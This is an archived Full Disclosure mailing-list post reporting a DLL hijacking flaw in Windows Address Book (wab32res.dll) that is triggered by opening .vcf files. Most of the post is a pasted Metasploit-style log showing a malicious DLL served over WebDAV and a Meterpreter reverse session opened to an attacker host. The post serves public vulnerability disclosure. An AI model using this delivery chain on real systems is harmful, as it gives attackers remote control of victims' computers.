Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

DLL hijacking (Windows Address Book - wab32res.dll)

From: matt <matt () attackvector org>
Date: Tue, 24 Aug 2010 13:57:42 -0500
For those interested, I just discovered that the Windows Address Book is
vulnerable to DLL hijacking when opening .vcf (and probably other) file
types.

http://www.attackvector.org/new-dll-hijacking-exploits-many/

[..snip..]
[*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll
[*] 10.0.0.252:1137 PROPFIND => 207 File (/hacku/wab32res.dll)
[*] 10.0.0.252:1133 GET => DLL Payload
[*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe
[*] 10.0.0.252:1137 PROPFIND => 404 (/hacku/rundll32.exe)
[*] 10.0.0.252:1133 GET => DATA (/hacku/owned.vcf)
[*] Sending stage (748544 bytes) to 10.0.0.252
[*] Meterpreter session 4 opened (1.2.3.4:31337 -> 10.0.0.252:1155) at Tue
Aug 24 13:49:02 -0500 2010

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: